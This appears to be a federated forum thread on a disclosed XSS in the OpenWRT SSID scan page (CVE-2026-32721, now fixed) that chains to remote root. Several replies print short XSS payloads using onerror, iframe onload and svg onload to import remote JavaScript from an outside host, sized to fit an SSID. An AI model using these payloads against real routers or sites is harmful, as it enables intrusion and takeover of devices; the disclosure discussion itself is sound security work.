Skip to content
  • Categories
  • Recent
  • Tags
  • Popular
  • World
  • Users
  • Groups
Skins
  • Light
  • Brite
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • Default (Cyborg)
  • No Skin
Collapse
Brand Logo

CIRCLE WITH A DOT

  1. Home
  2. Uncategorized
  3. Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/CVE-2026-32721, fixed in 24.10.6 / 25.12.1

Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/CVE-2026-32721, fixed in 24.10.6 / 25.12.1

Scheduled Pinned Locked Moved Uncategorized
17 Posts 12 Posters 0 Views
  • Oldest to Newest
  • Newest to Oldest
  • Most Votes
Reply
  • Reply as topic
Log in to reply
This topic has been deleted. Only users with topic management privileges can see it.
  • sash@hachyderm.ioS sash@hachyderm.io

    Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
    Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
    CVE-2026-32721, fixed in 24.10.6 / 25.12.1

    kouett@soc.kouett.net.eu.orgK This user is from outside of this forum
    kouett@soc.kouett.net.eu.orgK This user is from outside of this forum
    kouett@soc.kouett.net.eu.org
    wrote last edited by
    #4
    @sash oof. this one is bad 😄
    1 Reply Last reply
    0
    • sash@hachyderm.ioS sash@hachyderm.io

      Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
      Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
      CVE-2026-32721, fixed in 24.10.6 / 25.12.1

      lunareclipse@snug.moeL This user is from outside of this forum
      lunareclipse@snug.moeL This user is from outside of this forum
      lunareclipse@snug.moe
      wrote last edited by
      #5

      @sash hmmm I really need to update my router huh

      sash@hachyderm.ioS 1 Reply Last reply
      0
      • lunareclipse@snug.moeL lunareclipse@snug.moe

        @sash hmmm I really need to update my router huh

        sash@hachyderm.ioS This user is from outside of this forum
        sash@hachyderm.ioS This user is from outside of this forum
        sash@hachyderm.io
        wrote last edited by
        #6

        @lunareclipse or just don't open that scan page 😉

        1 Reply Last reply
        0
        • R relay@relay.infosec.exchange shared this topic
        • sash@hachyderm.ioS sash@hachyderm.io

          Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
          Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
          CVE-2026-32721, fixed in 24.10.6 / 25.12.1

          bafdyce@chaos.socialB This user is from outside of this forum
          bafdyce@chaos.socialB This user is from outside of this forum
          bafdyce@chaos.social
          wrote last edited by
          #7

          @sash TIL that this works:

          <a id=s href=//domain/x.js>
          <img src=x onerror=import(s)>

          This might come in handy in future pentests 🙂

          sash@hachyderm.ioS 1 Reply Last reply
          0
          • sash@hachyderm.ioS sash@hachyderm.io

            Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
            Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
            CVE-2026-32721, fixed in 24.10.6 / 25.12.1

            j_r@social.jugendhacker.deJ This user is from outside of this forum
            j_r@social.jugendhacker.deJ This user is from outside of this forum
            j_r@social.jugendhacker.de
            wrote last edited by
            #8

            @sash wow looks like a lot of people are upgrading right now, judging by the ASU server stats 🫣

            1 Reply Last reply
            0
            • R relay@relay.an.exchange shared this topic
            • sash@hachyderm.ioS sash@hachyderm.io

              Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
              Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
              CVE-2026-32721, fixed in 24.10.6 / 25.12.1

              shadowdancer@mstdn.socialS This user is from outside of this forum
              shadowdancer@mstdn.socialS This user is from outside of this forum
              shadowdancer@mstdn.social
              wrote last edited by
              #9

              @sash
              Thanks for the heads up! I frequent the forums but it's been a couple of days since my last visit so I missed this one. It seems the release was announced 17h ago.

              Now, if this was found in a commercial router firmware, how quickly would you guess there'd be a fix available?

              I'd say weeks, or maybe months.

              edit: hashtag for better reach #OpenWRT

              1 Reply Last reply
              0
              • sash@hachyderm.ioS sash@hachyderm.io

                Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
                Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
                CVE-2026-32721, fixed in 24.10.6 / 25.12.1

                nicksilkey@hachyderm.ioN This user is from outside of this forum
                nicksilkey@hachyderm.ioN This user is from outside of this forum
                nicksilkey@hachyderm.io
                wrote last edited by
                #10

                @sash what a find. thanks for sharing, friend. ✌️💙

                1 Reply Last reply
                0
                • sash@hachyderm.ioS sash@hachyderm.io

                  Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
                  Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
                  CVE-2026-32721, fixed in 24.10.6 / 25.12.1

                  uvok@woof.techU This user is from outside of this forum
                  uvok@woof.techU This user is from outside of this forum
                  uvok@woof.tech
                  wrote last edited by
                  #11

                  @sash funny coincidence, I fixed the same class of bug at work recently

                  sash@hachyderm.ioS 1 Reply Last reply
                  0
                  • uvok@woof.techU uvok@woof.tech

                    @sash funny coincidence, I fixed the same class of bug at work recently

                    sash@hachyderm.ioS This user is from outside of this forum
                    sash@hachyderm.ioS This user is from outside of this forum
                    sash@hachyderm.io
                    wrote last edited by
                    #12

                    @uvok there's a lot of these, I've been playing with it a lot over the last year, and I have some more fun ones in my queue waiting for release 🙂

                    1 Reply Last reply
                    0
                    • bafdyce@chaos.socialB bafdyce@chaos.social

                      @sash TIL that this works:

                      <a id=s href=//domain/x.js>
                      <img src=x onerror=import(s)>

                      This might come in handy in future pentests 🙂

                      sash@hachyderm.ioS This user is from outside of this forum
                      sash@hachyderm.ioS This user is from outside of this forum
                      sash@hachyderm.io
                      wrote last edited by
                      #13

                      @BafDyce Yeah that took me a bit of time to find. An alert(1) fits easy of course, but I have the most fun if I can show a full running exploitation to something practical 🙂

                      1 Reply Last reply
                      0
                      • sash@hachyderm.ioS sash@hachyderm.io

                        Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
                        Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
                        CVE-2026-32721, fixed in 24.10.6 / 25.12.1

                        dgl@infosec.exchangeD This user is from outside of this forum
                        dgl@infosec.exchangeD This user is from outside of this forum
                        dgl@infosec.exchange
                        wrote last edited by
                        #14

                        @sash very cool find! I think it would be possible to fit it (just) in 32 characters with: <iframe onload=import('//d.cx')>

                        (That url works; d.cx is serving a hello world alert payload at the moment, it works with e.g. https://d.cx/~dgl/l.html but I haven't tried actually doing it with OpenWRT.)

                        dgl@infosec.exchangeD 1 Reply Last reply
                        0
                        • dgl@infosec.exchangeD dgl@infosec.exchange

                          @sash very cool find! I think it would be possible to fit it (just) in 32 characters with: <iframe onload=import('//d.cx')>

                          (That url works; d.cx is serving a hello world alert payload at the moment, it works with e.g. https://d.cx/~dgl/l.html but I haven't tried actually doing it with OpenWRT.)

                          dgl@infosec.exchangeD This user is from outside of this forum
                          dgl@infosec.exchangeD This user is from outside of this forum
                          dgl@infosec.exchange
                          wrote last edited by
                          #15

                          @sash this takes advantage of the fact (some?) browsers by default load a blank iframe, so it's fewer characters than <img src=x onerror=...>. Works in Chrome at least.

                          freddy@social.security.plumbingF 1 Reply Last reply
                          0
                          • dgl@infosec.exchangeD dgl@infosec.exchange

                            @sash this takes advantage of the fact (some?) browsers by default load a blank iframe, so it's fewer characters than <img src=x onerror=...>. Works in Chrome at least.

                            freddy@social.security.plumbingF This user is from outside of this forum
                            freddy@social.security.plumbingF This user is from outside of this forum
                            freddy@social.security.plumbing
                            wrote last edited by
                            #16

                            @dgl @sash `<svg onload>` works in every browser and is shorter :). But maybe you don’t want your PoC to depend on the goodwill of a third party. And not everyone has a short domain.

                            dgl@infosec.exchangeD 1 Reply Last reply
                            0
                            • freddy@social.security.plumbingF freddy@social.security.plumbing

                              @dgl @sash `<svg onload>` works in every browser and is shorter :). But maybe you don’t want your PoC to depend on the goodwill of a third party. And not everyone has a short domain.

                              dgl@infosec.exchangeD This user is from outside of this forum
                              dgl@infosec.exchangeD This user is from outside of this forum
                              dgl@infosec.exchange
                              wrote last edited by
                              #17

                              @freddy @sash interesting… https://developer.mozilla.org/en-US/docs/Web/API/SVGElement/load_event claims it doesn’t work in Firefox and references a 15 year old bug… but yes, that would get a few more characters 🙂

                              1 Reply Last reply
                              1
                              0
                              Reply
                              • Reply as topic
                              Log in to reply
                              • Oldest to Newest
                              • Newest to Oldest
                              • Most Votes


                              • Login

                              • Login or register to search.
                              • First post
                                Last post
                              0
                              • Categories
                              • Recent
                              • Tags
                              • Popular
                              • World
                              • Users
                              • Groups